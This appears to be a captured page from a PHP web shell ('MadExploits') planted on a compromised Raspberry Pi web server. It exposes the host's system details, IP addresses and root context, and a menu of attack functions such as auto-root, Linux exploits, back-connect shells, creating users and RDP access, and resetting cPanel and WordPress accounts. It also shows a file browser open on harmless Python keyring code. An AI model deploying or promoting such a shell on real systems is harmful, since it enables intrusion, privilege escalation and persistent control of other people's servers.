Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
keyring /
backends /
[ HOME SHELL ]
Name
Size
Permission
Action
OS_X.py
1.47
KB
-rw-r--r--
OS_X.pyc
2.18
KB
-rw-r--r--
SecretService.py
3.37
KB
-rw-r--r--
SecretService.pyc
3.77
KB
-rw-r--r--
Windows.py
5.48
KB
-rw-r--r--
Windows.pyc
6.33
KB
-rw-r--r--
_OS_X_API.py
9.29
KB
-rw-r--r--
_OS_X_API.pyc
8.34
KB
-rw-r--r--
__init__.py
0
B
-rw-r--r--
__init__.pyc
148
B
-rw-r--r--
chainer.py
1.98
KB
-rw-r--r--
chainer.pyc
2.84
KB
-rw-r--r--
fail.py
675
B
-rw-r--r--
fail.pyc
1.11
KB
-rw-r--r--
kwallet.py
4.71
KB
-rw-r--r--
kwallet.pyc
5.36
KB
-rw-r--r--
null.py
344
B
-rw-r--r--
null.pyc
841
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : OS_X.py
import platform from ..backend import KeyringBackend from ..errors import PasswordSetError from ..errors import PasswordDeleteError from ..util import properties try: from . import _OS_X_API as api except Exception: pass class Keyring(KeyringBackend): """macOS Keychain""" keychain = None "Pathname to keychain filename, overriding default keychain." @properties.ClassProperty @classmethod def priority(cls): """ Preferred for all macOS environments. """ if platform.system() != 'Darwin': raise RuntimeError("macOS required") return 5 def set_password(self, service, username, password): if username is None: username = '' try: api.set_generic_password( self.keychain, service, username, password) except api.Error: raise PasswordSetError("Can't store password on keychain") def get_password(self, service, username): if username is None: username = '' try: return api.find_generic_password(self.keychain, service, username) except api.NotFound: pass def delete_password(self, service, username): if username is None: username = '' try: return api.delete_generic_password( self.keychain, service, username) except api.Error: raise PasswordDeleteError("Can't delete password in keychain")
Close